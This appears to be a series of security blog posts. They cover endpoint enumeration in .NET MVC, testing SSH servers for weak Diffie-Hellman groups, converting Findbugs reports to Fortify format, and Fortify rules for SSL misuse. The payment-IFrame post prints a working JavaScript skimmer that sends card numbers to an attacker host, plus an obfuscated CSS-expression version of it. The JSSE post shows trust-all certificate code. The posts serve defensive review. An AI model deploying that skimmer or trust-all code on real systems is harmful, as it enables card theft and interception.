Friday, Aug 21, 2015

Enumerating .NET MVC Application Endpoints with Roslyn

When performing security code reviews of .NET web applications, one of the first goals for the reviewer should be to enumerate the external-facing attack surface. For ASPX-based applications this is achieved by enumerating all files with an aspx or ascx extension. Additionally, the ‘web.config’ file should be parsed for any exposed HttpModules, HttpHandlers and configured web services. Over the years, more and more applications have been transitioning to .NET MVC, and with this transition the process for enumerating endpoints becomes trickier.

In a .NET MVC web application, Controllers handle the processing of incoming requests and are tied to the URL endpoints the application exposes. To enumerate an application’s web attack surface, the reviewer must find all classes that inherit from a Controller base class and enumerate their public methods. Additionally, .NET MVC introduces Filter Attributes that can be set at the Global, Controller (class) or Action (method) level.

For example, the DataController class in the code snippet below exposes an action named Index() that returns the current time. This action is decorated with the OutputCache action filter.

Therefore, prior to executing the code within the method, the logic of the ‘OutputCache’ action filter is executed first. .NET provides a set of Filter Attributes out of the box, and you can also create your own. The ‘HttpGet’ attribute restricts the action to accepting only GET requests, while the ‘Route’ attribute defines the URL endpoint a user must request in order to be routed to the ‘Index()’ method.

Snippet 1 – Controllers\DataController.cs

public class DataController : Controller
{
	[OutputCache(Duration=10)]
	[HttpGet]
	[Route("index")]
	public string Index(){
		return DateTime.Now.ToString("T");
	}
}

It is very common for applications to use Filter Attributes to handle security related tasks. Some frequently observed examples of security related logic are:

  • Authentication enforcement

  • User/role based access control

  • CSRF token validation

  • Cache control headers

  • Setting of HTTP security headers

Having the ability to enumerate all exposed application endpoints and their associated Filter Attributes becomes very powerful during a manual security code review. The code reviewer will have the ability to quickly identify the application’s attack surface and identify gaps in security coverage based on the Filter Attributes assigned.

USING THE ROSLYN API

To perform our enumeration we used the .NET Compiler Platform (Roslyn), which provides open-source C# and Visual Basic compilers with powerful code analysis APIs and enables building code analysis tools with the same APIs that Visual Studio uses. It is a workable ‘compiler as a service’: it exposes the C# compiler as an API that developers can call to work with the syntax tree. These APIs allow us to automate the enumeration process far more accurately than regex-based ‘grepping’.

The Roslyn APIs are available by default within Visual Studio 2015. Alternatively, they can be installed through NuGet via the ‘Microsoft.CodeAnalysis’ package.

Using the APIs, we can iterate through all ‘*.cs’ files within a given directory and parse each file using the ‘CSharpSyntaxTree.ParseText’ method. This method turns the parsed file into a syntax tree that can then be analyzed.

using (var stream = File.OpenRead(path))
{
    var tree = CSharpSyntaxTree.ParseText(
        SourceText.From(stream), path: path);

    SyntaxNode root = tree.GetRoot();
    // ... walk the syntax tree from here ...
}

To identify the classes that inherit from a Controller class, you can traverse the syntax tree and check the base types of each class declaration.

public bool InheritsFromController(SyntaxNode root)
{
    bool isValid = false;

    try
    {
        // True if any declared base type is Controller or ApiController
        isValid = root.DescendantNodes()
            .OfType&lt;BaseTypeSyntax&gt;()
            .Any(t =&gt; t.ToString().Equals("Controller") ||
                      t.ToString().Equals("ApiController"));
    }
    catch (InvalidOperationException)
    {
        // No class declaration / base list in this file
    }

    return isValid;
}

Retrieving the class declaration for the Controller and all of its public methods can be performed using the following code.

ClassDeclarationSyntax controller =
    root.DescendantNodes().OfType&lt;ClassDeclarationSyntax&gt;()
        .First();

// Get all the public methods in this class
IEnumerable&lt;MethodDeclarationSyntax&gt; methods =
    from m in root.DescendantNodes()
                  .OfType&lt;MethodDeclarationSyntax&gt;()
    where m.Modifiers.ToString().Contains("public")
    select m;

Now that the Controller and its public methods are enumerated we can extract the attributes assigned at both the class and method levels. The attributes can be retrieved by reading the ‘AttributeLists’ property of the ClassDeclarationSyntax and/or MethodDeclarationSyntax objects.

Public methods with a route defined are potential entry points to the application and can be invoked through HTTP requests. Before invoking the code within the method, the request will be processed by the filter attributes defined globally, at the controller level and at the method level.

.NET MVC Enumeration Tool

We are releasing a tool that utilizes the Roslyn API to automate the enumeration of .NET MVC controller entry points. The tool runs against a given directory and identifies:

  • All classes that inherit from a Controller class

  • All public methods within each Controller class

  • Attributes assigned to each method, including those set at the class level

The basic usage of the script is as follows:

> DotNetMVCEnumerator.exe -h

Usage: DotNetMVCEnumerator.exe

[-d Directory To Scan  *Required]

[-a Attribute Name to Search]

[-n Attribute Name To Perform Negative Search]

[-o File Name to Output Results as CSV]

[-h Display Usage Help Text]

Sample Usage 1 - Scan code within a directory and write output to the ‘results.csv’ file.

> DotNetMVCEnumerator.exe -d "C:\Code" -o results.csv

Sample Usage 2 - Scan code and only include results of methods containing the ‘CSRFTokenValidate’ attribute filter. The output is written to the console and to the ‘results.csv’ file.

> DotNetMVCEnumerator.exe -d "C:\Code" -o results.csv -a CSRFTokenValidate

Sample Usage 3 - Scan code and only include results of methods missing the ‘Authorize’ filter attribute. The output is written to the console and to the ‘results.csv’ file.

> DotNetMVCEnumerator.exe -d "C:\Code" -o results.csv -n Authorize

The tool is very useful to quickly identify any methods that may be missing authorization controls enforced through filter attributes. The CSV output is very helpful during manual code reviews in order to:

  • Quickly identify test/debug or administrative functionality that is accidentally exposed, based on the Controller name, method name or URL route path.

  • Identify classes that are missing filter attributes and therefore may be missing the enforcement of security controls.

  • Keep track of your manual code review progress by leaving comments in the spreadsheets as each external entry point is reviewed.

Excel can be used to perform column based filtering based on your needs. 

The source code and binary for the tool can be found on our Github repository:

https://github.com/GDSSecurity/DotNET-MVC-Enumerator

Monday, Aug 03, 2015

SSH Weak Diffie-Hellman Group Identification Tool

Introduction

The LogJam attack against the TLS protocol allows a man-in-the-middle attacker to downgrade a TLS connection such that it uses weak cipher suites (known as export cipher suites). More precisely, the attack forces a Diffie-Hellman (DH) key exchange based on a weak group. A group (multiplicative group modulo p where p is prime) is considered weak if the defining prime has a low bit length.

Many key exchange protocol implementations, including those for TLS, utilize publicly known DH groups such as the Oakley groups used for IKE. The disadvantage of employing a publicly known group is that an attacker may already have precomputed information that helps in breaking an instance of a DH key exchange relying on that group. To impede precomputation attacks, TLS implementations typically enable the configuration of unique DH groups on the server-side.

The DH key exchange protocol is not only used as part of the TLS protocol but for many other protocols including the SSH protocol. While there are test tools (e.g. the web tool from the LogJam authors or the command-line openssl tool) which check whether the LogJam vulnerability exists for TLS-based services, there are currently no test tools available for SSH.

Weak Diffie-Hellman Groups in SSH

In contrast to TLS, the SSH protocol (defined in RFC 4253) does not support export cipher suites and does not suffer from a known design flaw enabling cipher suite downgrade attacks. The SSH protocol specification requires implementations to support at least the following two DH key exchange methods:

  • diffie-hellman-group1-sha1

  • diffie-hellman-group14-sha1

Both methods use an Oakley group; the first method uses the Oakley Group 2 of size 1024 bits and the second method uses the Oakley Group 14 of size 2048 bits.

The authors of the LogJam paper envision that it may be possible for nation states to break 1024-bit groups. Therefore, the authors recommend disabling diffie-hellman-group1-sha1 on the server side. For example, OpenSSH allows the enabled key exchange methods to be restricted through the KexAlgorithms parameter in the server configuration file, typically located at /etc/ssh/sshd_config. This method is also expected to be disabled by default in the upcoming OpenSSH 7.0 release.
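On OpenSSH, that hardening might look like the following sshd_config fragment. The exact option value is illustrative; check the sshd_config(5) man page for the methods your OpenSSH version supports.

```
# /etc/ssh/sshd_config -- allow only stronger key exchange methods
KexAlgorithms curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha1
```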

Besides the two discussed DH key exchange protocols, many SSH clients and servers implement the two additional DH group exchange methods from RFC 4419:

  • diffie-hellman-group-exchange-sha1

  • diffie-hellman-group-exchange-sha256

When using either of these methods the SSH client starts the exchange protocol by proposing a minimal, preferred, and maximal group size in bits. The server then picks “a group that best matches the client’s request”. However, RFC 4419 leaves open how the server makes this choice. Therefore, the chosen group size is implementation-dependent. Finally, the client and server execute the DH protocol to exchange a key.
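Because RFC 4419 leaves the selection strategy open, different servers behave differently. The following sketch shows one plausible policy in Python; it is an illustration of the idea, not a transcription of any particular server's moduli selection.

```python
def choose_group_size(minimum, preferred, maximum, available_sizes):
    """Pick a modulus size that 'best matches the client's request':
    the smallest available size >= preferred within [minimum, maximum],
    else the largest size that still fits, else None."""
    candidates = sorted(s for s in available_sizes if minimum <= s <= maximum)
    if not candidates:
        return None  # a real server would reject the key exchange
    for size in candidates:
        if size >= preferred:
            return size
    return candidates[-1]
```

Under this policy a client pinning min = nbits = max to a single value, as our tool does, forces the server to either produce a group of exactly that size or fail, which is what makes the probing technique work.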

The authors of the LogJam paper recommend using ECDH or generating large, unique DH groups on the server for the DH group exchange protocols. For the OpenSSH server implementation, they provide the following commands that generate unique 2048-bit DH groups:

  • ssh-keygen -G moduli-2048.candidates -b 2048

  • ssh-keygen -T moduli-2048 -f moduli-2048.candidates

The file moduli-2048 is then used to replace the system SSH moduli file, typically /etc/ssh/moduli.

The DH key exchange protocol parameters that the client and server end up using depend on both the client and server configuration. As explained in RFC 4253, both the client and server propose a list of supported key exchange algorithms (in this context, the terms protocol and algorithm are interchangeable), ordered by preference with the most preferred algorithm first. In simple terms, if the client and server do not share the same first choice, they iterate over the client’s algorithm list and choose the first algorithm that both sides support and that is compatible with the other algorithms SSH relies upon.
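The negotiation rule can be sketched as follows. This is a simplified Python illustration: the compatibility checks against the other negotiated algorithms are omitted.

```python
def negotiate_kex(client_algorithms, server_algorithms):
    """Simplified RFC 4253 negotiation: if both sides' first choice
    matches, use it; otherwise take the first entry in the client's
    preference-ordered list that the server also supports."""
    if client_algorithms and server_algorithms \
            and client_algorithms[0] == server_algorithms[0]:
        return client_algorithms[0]
    for algorithm in client_algorithms:
        if algorithm in server_algorithms:
            return algorithm
    return None  # negotiation fails and the connection is closed
```

This client-preference rule is what lets our tool steer the server: by offering only a single key exchange algorithm, the client forces the server to either use it or close the connection.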

Contribution

We present a tool to identify whether an SSH server configuration permits the use of a weak DH key exchange group. To determine whether an SSH client is able to exchange a key using a weak DH group, our tool attempts to connect to the server with specific client configurations. The configuration parameters include the key exchange algorithm and the minimum, preferred, and maximum group sizes. While we provide diverse test configurations, it is straightforward to add new configurations or modify the existing ones. Furthermore, the user may configure additional client parameters such as the list of preferred encryption and MAC algorithms.

Our tool is really a toolchain consisting of three components: a shell script, a patched OpenSSH client, and a Python-based analysis script. The shell script enumerates all user-specified configurations. It uses an OpenSSH client that has been patched to abort the network connection after completing the key exchange; consequently, this client never attempts to authenticate to the server. Moreover, our OpenSSH client patch allows the minimum, preferred, and maximum group sizes in bits to be specified through the command-line option -d (mnemonic: Diffie-Hellman). The adapted client prints important information about the DH key exchange, and the shell script stores this output in files. To analyze these files we provide a Python script, which the shell script launches automatically; it is also possible to run the analysis script later on the output files.

We chose the OpenSSH client, since it is a widely used open source SSH client implementing an extensive set of features. Moreover, these features are easy to configure using a configuration file or command-line options. In particular, we patch the latest stable version of the portable OpenSSH client (OpenSSH 6.9p1). Testing was conducted on Ubuntu 14.04 and Mac OS X Yosemite.

Example

In the following example, we run our tool against an OpenSSH 6.6.1p1 server as it is shipped with Ubuntu 14.04, i.e. the server uses the default configuration.

To run our tool, we specify the host where the server is running and optionally specify the port number (defaults to 22).

Script invocation

KEX proposal client: curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1
KEX proposal server: curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1
KEX algorithm chosen: curve25519-sha256@libssh.org
——— SNIP ———
KEX proposal client: diffie-hellman-group-exchange-sha256
KEX proposal server: curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1
KEX algorithm chosen: diffie-hellman-group-exchange-sha256
KEX client group sizes: min = 768, nbits = 768, max = 768
Connection closed by 127.0.0.1
KEX proposal client: diffie-hellman-group-exchange-sha256
KEX proposal server: curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1
KEX algorithm chosen: diffie-hellman-group-exchange-sha256
KEX client group sizes: min = 1024, nbits = 1024, max = 1024
KEX server-chosen group size in bits: 1024
——— SNIP ———
KEX proposal client: diffie-hellman-group-exchange-sha256
KEX proposal server: curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1
KEX algorithm chosen: diffie-hellman-group-exchange-sha256
KEX client group sizes: min = 2048, nbits = 2048, max = 2048
KEX server-chosen group size in bits: 2048

Analysis of results

——— SNIP ———

The client proposed the following group size parameters (in bits): min=1024, nbits=1024, max=1024.

The client and server negotiated a group size of 1024 using diffie-hellman-group-exchange-sha1.

The security level is INTERMEDIATE (might be feasible to break for nation-states).

——— SNIP ———

The client proposed the following group size parameters (in bits): min=2048, nbits=2048, max=2048.

The client and server negotiated a group size of 2048 using diffie-hellman-group-exchange-sha256.

The security level is STRONG.

The trimmed output above shows that the server supports the curve25519-sha256@libssh.org key exchange algorithm. Moreover, we can observe that the server closes the connection when the client requests a 768-bit group in conjunction with the diffie-hellman-group-exchange-sha256 algorithm. Another interesting finding is that the server permits DH key exchanges using a 1024-bit group. While a 1024-bit group is sufficient in many environments, attackers with nation-state-scale resources may be able to break the key exchange. If a higher level of security is needed, a server administrator could reconfigure the SSH server and rerun our tool to validate that the configuration is as desired.

Conclusions

We presented a tool which establishes multiple connections to an SSH server, enumerating various client configurations, in order to determine whether the server allows a DH key exchange based on a weak group. We hope that our tool will be useful for checking SSH servers for weak DH key exchange configurations.

The source code to the tool can be found on our Github repository:

https://github.com/GDSSecurity/SSH-Weak-DH


Monday, Jul 13, 2015

The Perils of Implementing Secure Payment IFrames

Web applications that handle sensitive data, in particular card payment information, commonly use an embedded IFrame to provide users with a seamless customer experience. This IFrame (which may be provided by a third-party payment service provider) should be served from a separate domain to leverage the browser’s same-origin policy controls. These controls prevent direct interaction between the consuming web application and the frame processing the payment details; for example, JavaScript executing within the business application cannot read cardholder details from within the embedded payment frame. This is a common justification for removing the application from the scope of PCI-DSS assessment, leaving only the (possibly third-party) IFrame that handles payment card data.

This method of segregating sites which handle card data from those that don’t can be effective, provided some requirements are met. The first, as mentioned above, is that the business application and payment gateway should be served from completely different domains. It is important to note that subdomains should not be used unless the security implications are fully understood, as in some cases the same-origin policy can be bypassed by changing the “document.domain” value for the page. The second requirement is that no unvalidated data is passed from the business application to the payment IFrame. This is of critical importance: if data controllable by an attacker is processed within the context of the payment domain, it may become possible for the attacker to read data, such as the user’s Primary Account Number, from the payment IFrame.

While these concepts seem simple, the second requirement is one which bears closer inspection. Ensuring that data such as text supplied by the user is not passed to the payment IFrame is an obvious security control in this scenario. There are, however, other, sometimes overlooked situations in which data could be passed into the payment IFrame. It is one such example, which GDS has encountered during security assessments, that we’ll examine below: stylesheets.

In many cases the source page for the payment IFrame is a generic site which handles payments for a large number of business applications, either within the same organisation or as a service to third parties. This page is unlikely to be styled the same way as the site using it, which may be an issue if it is important to reassure customers that they are dealing with a trustworthy retailer, or to present a consistent brand identity. To address this, it may be important to style the payment IFrame as if it were part of the business application in which it is embedded. This can be achieved by using images and CSS files which match those used by the business application; however, this opens up a potential problem.

If the image or CSS files used to style the payment IFrame are imported directly from the business application site, then an attacker who gains control over the business application, or the server it resides on, may be able to insert malicious data into these files, and consequently into the payment IFrame. This compromises the security model used by the application to isolate sensitive data and potentially brings the entire business application into scope for assessment of card data handling.

To avoid this scenario it is therefore important to ensure that all external resources used by the IFrame are only loaded from trusted locations that are not controlled by the business application or its hosting system. Any resources provided by the application or application owners should be reviewed prior to being made available from the payment domain to ensure that they are suitable.

Example Attack

The following is an example of an attack which could be carried out using a compromised CSS file.

For demonstration purposes this is what the page looks like without the style applied, the borders of the IFrame are clearly visible.

When the style from the business application is applied the page looks like this, as you can see the IFrame, though still present, is not clearly visible.

The code to include the payment IFrame in the business application is as follows:

&lt;iframe src="https://payment-provider.gds:4443/customer_pan.html#css=https://business-application.gds/style.css" width="600" height="110" frameBorder="0"&gt;&lt;/iframe&gt;

As can be seen, the payment site is hosted on a different domain and port from the business application, so the restrictions of the same-origin policy apply. However, the payment IFrame loads the CSS file of the business application, whose URL is passed in the fragment shown above.

If an attacker were to gain control of the business application they could change the stylesheet to insert a malicious payload. The following example is JavaScript code that extracts the customer’s PAN when the “Next” button is clicked and sends it to a remote, attacker-controlled location.

if (document.getElementById("stealer") == null) {
  var node = document.createElement("script");
  node.setAttribute("id", "stealer");
  node.text = 'function steal() {' +
    'if (window.XDomainRequest) {' +
      'xmlhttp = new XDomainRequest()' +
    '} else if (window.XMLHttpRequest) {' +
      'xmlhttp = new XMLHttpRequest()' +
    '} else {' +
      'xmlhttp = new ActiveXObject("Microsoft.XMLHTTP")' +
    '};' +
    'xmlhttp.open("GET",' +
      '"https://attacker.gds:31337/index.html?pan=" +' +
      'document.getElementById("customerPan").value,' +
      'false);' +
    'xmlhttp.send();' +
    'document.getElementById("payment").submit()' +
  '};';
  document.getElementsByTagName('head')[0].appendChild(node);
}
try {
  document.getElementById("next").outerHTML =
    '&lt;input id="next2" type="button" value="Next" onClick="steal()"&gt;';
} catch (err) { }

Making this code execute from a CSS file can be achieved using CSS expressions. These trigger whenever any action is performed on the page, so it is necessary to verify that new elements have not already been added and to catch any errors that may occur when replacing elements.

The following code (an encoding of the above) can be added as the first line of the style sheet to execute this attack.

@import "data:,*%7bx:expression(eval(String.fromCharCode(105,
  102, 40, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103,
  101, 116, 69, 108, 101, 109, 101, 110, 116, 66, 121, 73,
  100, 40, 34, 115, 116, 101, 97, 108, 101, 114, 34, 41, 32,
  61, 61, 32, 110, 117, 108, 108, 41, 123, 118, 97, 114, 32,
  110, 111, 100, 101, 61, 100, 111, 99, 117, 109, 101, 110,
  116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109,
  101, 110, 116, 40, 34, 115, 99, 114, 105, 112, 116, 34, 41,
  59, 110, 111, 100, 101, 46, 115, 101, 116, 65, 116, 116,
  114, 105, 98, 117, 116, 101, 40, 34, 105, 100, 34, 44, 34,
  115, 116, 101, 97, 108, 101, 114, 34, 41, 59, 110, 111,
  100, 101, 46, 116, 101, 120, 116, 61, 39, 102, 117, 110,
  99, 116, 105, 111, 110, 32, 115, 116, 101, 97, 108, 40, 41,
  123, 105, 102, 40, 119, 105, 110, 100, 111, 119, 46, 88,
  68, 111, 109, 97, 105, 110, 82, 101, 113, 117, 101, 115,
  116, 41, 123, 120, 109, 108, 104, 116, 116, 112, 32, 61,
  32, 110, 101, 119, 32, 88, 68, 111, 109, 97, 105, 110, 82,
  101, 113, 117, 101, 115, 116, 40, 41, 125, 101, 108, 115,
  101, 32, 105, 102, 40, 119, 105, 110, 100, 111, 119, 46,
  88, 77, 76, 72, 116, 116, 112, 82, 101, 113, 117, 101, 115,
  116, 41, 123, 120, 109, 108, 104, 116, 116, 112, 32, 61,
  32, 110, 101, 119, 32, 88, 77, 76, 72, 116, 116, 112, 82,
  101, 113, 117, 101, 115, 116, 40, 41, 125, 101, 108, 115,
  101, 123, 120, 109, 108, 104, 116, 116, 112, 32, 61, 32,
  110, 101, 119, 32, 65, 99, 116, 105, 118, 101, 88, 79, 98,
  106, 101, 99, 116, 40, 34, 77, 105, 99, 114, 111, 115, 111,
  102, 116, 46, 88, 77, 76, 72, 84, 84, 80, 34, 41, 125, 59,
  120, 109, 108, 104, 116, 116, 112, 46, 111, 112, 101, 110,
  40, 34, 71, 69, 84, 34, 44, 34, 104, 116, 116, 112, 115,
  58, 47, 47, 97, 116, 116, 97, 99, 107, 101, 114, 46, 103,
  100, 115, 58, 51, 49, 51, 51, 55, 47, 105, 110, 100, 101,
  120, 46, 104, 116, 109, 108, 63, 112, 97, 110, 61, 34, 43,
  100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116,
  69, 108, 101, 109, 101, 110, 116, 66, 121, 73, 100, 40, 34,
  99, 117, 115, 116, 111, 109, 101, 114, 80, 97, 110, 34, 41,
  46, 118, 97, 108, 117, 101, 44, 102, 97, 108, 115, 101, 41,
  59, 120, 109, 108, 104, 116, 116, 112, 46, 115, 101, 110,
  100, 40, 41, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46,
  103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 66, 121,
  73, 100, 40, 34, 112, 97, 121, 109, 101, 110, 116, 34, 41,
  46, 115, 117, 98, 109, 105, 116, 40, 41, 125, 59, 39, 59,
  100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116,
  69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97,
  103, 78, 97, 109, 101, 40, 39, 104, 101, 97, 100, 39, 41,
  91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105,
  108, 100, 40, 110, 111, 100, 101, 41, 125, 59, 116, 114,
  121, 123, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103,
  101, 116, 69, 108, 101, 109, 101, 110, 116, 66, 121, 73,
  100, 40, 34, 110, 101, 120, 116, 34, 41, 46, 111, 117, 116,
  101, 114, 72, 84, 77, 76, 61, 39, 60, 105, 110, 112, 117,
  116, 32, 105, 100, 61, 34, 110, 101, 120, 116, 50, 34, 32,
  116, 121, 112, 101, 61, 34, 98, 117, 116, 116, 111, 110,
  34, 32, 118, 97, 108, 117, 101, 61, 34, 78, 101, 120, 116,
  34, 32, 111, 110, 67, 108, 105, 99, 107, 61, 34, 115, 116,
  101, 97, 108, 40, 41, 34, 62, 39, 125, 99, 97, 116, 99,
  104, 40, 101, 114, 114, 41, 123, 125)))%7D";
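Encodings like the one above need not be produced by hand. A short helper along these lines (an illustrative sketch, not part of the attack tooling) converts arbitrary JavaScript into the fromCharCode form used here:

```python
def to_css_expression(javascript):
    """Encode JavaScript as a CSS expression payload. String.fromCharCode
    sidesteps quoting issues inside the stylesheet; %7b/%7d are the
    URL-encoded braces of the CSS declaration block."""
    codes = ", ".join(str(ord(c)) for c in javascript)
    return ('@import "data:,*%7bx:expression(eval('
            'String.fromCharCode(' + codes + ')))%7d";')
```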

The following screenshot shows the screen after the customer has entered their card number, for demonstration purposes other card details are not required by this form but could also be trivially captured by an attacker.

When the “Next” button is clicked the customer’s PAN is sent to the attacker and the form is submitted. To the user it appears that nothing unusual has occurred and the normal next screen of the payment process is shown.

However the customer’s PAN has already been received by the attacker as shown below.

Caveats

There are some limitations to this particular attack, though other attacks exist that may not suffer the same limitations or that may work on other browsers. This implementation is limited to attacking users on Internet Explorer, as it makes use of the CSS expression statement. The attack will also normally only work on Internet Explorer 7 and below; however, Internet Explorer versions up to 10 (Windows 8.0) can be vulnerable. This is because Internet Explorer renders pages shown in an IFrame in the same compatibility mode as the parent frame. If an attacker controls the business application, they can set the meta tag “&lt;meta http-equiv=’X-UA-Compatible’ content=’IE=7’&gt;” in the HTML header to force Internet Explorer 7 compatibility mode on the parent page, and therefore on the payment provider page. In Internet Explorer 11 (Windows 7 if updated, and Windows 8.1), CSS expressions are disabled for the “Internet” zone, so for this version the attack would only work for sites in the “Local intranet” or “Trusted sites” zones.

Saturday, Jun 13, 2015

Converting Findbugs XML to HP Fortify SCA FPR

At GDS, we frequently encounter organizations with mature Secure Development Lifecycle (SDL) processes that have integrated HP Fortify to perform static code analysis. As discussed in our previous post, GDS often assists organizations by developing custom security checks for security issues or insecure patterns identified during manual security code review. However, there are languages that Fortify does not directly support, making it difficult to integrate code written in those languages into an organization’s existing analysis framework.

Scala is an example of a language that is not supported by Fortify and therefore other static analysis tools must be used to perform security checks. In a previous blog post, we discussed how the Findbugs static analysis tool can be used to perform static analysis of Scala application bytecode. How can the Findbugs scan results be incorporated into an organization’s existing HP Fortify SSC server to manage the identified vulnerabilities? We have written a lightweight Java tool that can be used to convert a Findbugs XML report into a Fortify FPR file. This will allow the Findbugs results to be submitted to the SSC server as if scanned by HP Fortify SCA.

A Fortify FPR file is a compressed archive with a well-defined internal directory structure.

The result of the SCA analysis is stored in the audit.fvdl file in an XML format. The tool we have developed takes a Findbugs XML report and transforms it into an FPR file.

The Findbugs XML is first merged with a messages.xml file that contains the finding descriptions and recommendations, using both the Findbugs bundled findings and the GDS-developed Scala ones. It is also possible to use a custom messages.xml as input. This is particularly useful for adding new write-ups for your own custom rules for Findbugs.
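The merge step can be pictured roughly like this. The element and attribute names below are simplified stand-ins for the real Findbugs report and messages.xml formats, so treat this as an illustration of the idea rather than the tool's actual code:

```python
import xml.etree.ElementTree as ET

def merge_messages(findbugs_xml, messages_xml):
    """Attach the write-up from messages.xml to each BugInstance in a
    Findbugs report, keyed on the bug pattern type attribute."""
    report = ET.fromstring(findbugs_xml)
    messages = ET.fromstring(messages_xml)
    by_type = {m.get("type"): m for m in messages.findall("Message")}
    for bug in report.iter("BugInstance"):
        write_up = by_type.get(bug.get("type"))
        if write_up is not None:
            bug.append(write_up)  # embed description/recommendation
    return ET.tostring(report, encoding="unicode")
```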

The merged file is then transformed to the FVDL data structure through an XSL Transformation.

The XSLT processor takes the XML source document, plus an XSLT stylesheet, and processes them to produce an output document.

This audit.fvdl file is then added to a pre-packaged zip archive with the other required files.

This way, the transformation is completely decoupled from the code and depends only on the XSLT stylesheet used, which can be modified without recompiling the tool.

The application is packaged in a single runnable jar and can be used as follows:

$ java -jar convert2FPR.jar findbugs report.xml

To supply a custom messages.xml file, usage is as follows:

$ java -jar convert2FPR.jar findbugs messages.xml report.xml

The output file in both cases is ./report.fpr.

The first parameter (findbugs) selects the input format and maps to the corresponding XSL stylesheet, as in the Java snippet below:

static {
    formats.put("findbugs", "com/gds/convert2fpr/findbugs/fvdl.xsl");
}

To extend the tool to support further input formats, only a new XSL stylesheet and one additional line in the code above are required.

The source code and compiled tool can be found on our Github Repository below:
https://github.com/GDSSecurity/Convert2FPR/

Monday, Jun 08, 2015

Fortify SCA Custom Rules for JSSE APIs Misuse

While delivering GDS secure SDLC services, we often develop a range of custom security checks and static analysis rules for detecting insecure coding patterns found during our source code security reviews. These patterns can represent common security flaws or security weaknesses unique to the application being assessed, its architecture/design, the components it uses, or even the development team itself. The custom rules typically target a specific language and static analysis tool, depending on what our client already uses or is most comfortable with; previous examples include FindBugs, PMD, Visual Studio and, of course, Fortify SCA.

In this blog post I will be focusing on developing PoC rules for Fortify SCA to target Java based applications, however, the same concepts can easily be extended to other tools and/or development languages.

The recent vulnerability that affected Duo Mobile confirms the analysis of Georgiev et al., who demonstrated that a wide range of serious security flaws result from incorrect SSL/TLS certificate validation in various non-browser software, libraries and middleware.

Specifically, in this post we focus on how to identify insecure use of the SSL/TLS APIs in Java, which could result in Man-in-the-Middle or spoofing attacks allowing a malicious host to impersonate a trusted one. The integration of HP Fortify SCA in the SDLC allows applications to be efficiently scanned for vulnerabilities on a regular basis. We found that issues arising from SSL API misuse are not identified by the out of the box rule-sets, so we developed a comprehensive pack of 12 custom rules for Fortify.

Secure Sockets Layer (SSL/TLS) is the most widely used protocol for secure communication over the web using cryptographic processes to provide authentication, confidentiality, and integrity. To ensure the identity of the party, X.509 certificates must be exchanged and verified. Once the parties are authenticated, the protocol provides an encrypted connection. The algorithms used for encryption in SSL include a secure hash function, which guarantees the integrity of the data.

When using SSL/TLS, the following two steps must be performed in order to ensure no man in the middle tampers with the channel:

  • Certificate Chain-Of-Trust verification: a X.509 certificate specifies the name of the certificate authority (CA) that issued the certificate. The server also sends to the client a list of certificates of the intermediate CA all the way to a root CA. The client verifies the signature, expiration (and other checks out of the scope of this post such as revocation, basic constraints, policy constraints, etc) of each certificate starting from the server’s certificate at the bottom going up to the root CA. If the algorithm reaches the last certificate in the chain, with no violations, then verification is successful.
  • Hostname Verification: after the chain of trust is established, the client must verify that the subject of the X.509 certificate matches the fully qualified DNS name of the requested server. RFC2818 prescribes to use SubjectAltNames and Common Name for backwards compatibility.
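When the high-level HttpsURLConnection API is used without customisation, both of these checks run automatically. A minimal sketch (the URL is illustrative, and actually connecting requires network access):

```java
import java.net.URL;
import javax.net.ssl.HttpsURLConnection;

public class DefaultVerification {
    public static void main(String[] args) throws Exception {
        // With the high-level API, chain-of-trust and hostname verification
        // both run by default: connect() throws an SSLHandshakeException if
        // either check fails. No extra code is required.
        HttpsURLConnection conn = (HttpsURLConnection)
                new URL("https://example.com/").openConnection();
        conn.connect();
        System.out.println(conn.getResponseCode());
        conn.disconnect();
    }
}
```

The insecure patterns described below all start from a developer overriding one of these safe defaults.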

The following mis-use cases can occur when SSL/TLS APIs are not used securely and can cause an application to transmit sensitive information over a compromised SSL/TLS channel.

Trusting All Certificates

The application implements a custom TrustManager whose logic trusts every presented server certificate without performing the Chain-Of-Trust verification.

TrustManager[] trustAllCerts = new TrustManager[] {
    new X509TrustManager() {
        ...
        public void checkServerTrusted(X509Certificate[] certs,
                String authType) {}
    }
};

This case usually originates from development environments where self-signed certificates are widely used. In our experience, we commonly find developers disabling certificate validation altogether instead of loading the certificate into their keystore. This leads to this dangerous coding pattern accidentally making its way into production releases.

When this occurs, it is similar to removing the batteries from a smoke detector: the detector (validation) will still be there, providing a false sense of safety as it will not detect the smoke (un-trusted party). In fact, when a client connects to a server, the validation routine will happily accept any server certificate.

A search on GitHub for the above vulnerable code returns 13,823 results. On StackOverflow, a number of questions ask how to ignore certificate errors, and the replies often mirror the above vulnerable code. It is concerning that the most upvoted answers suggest disabling trust management entirely.
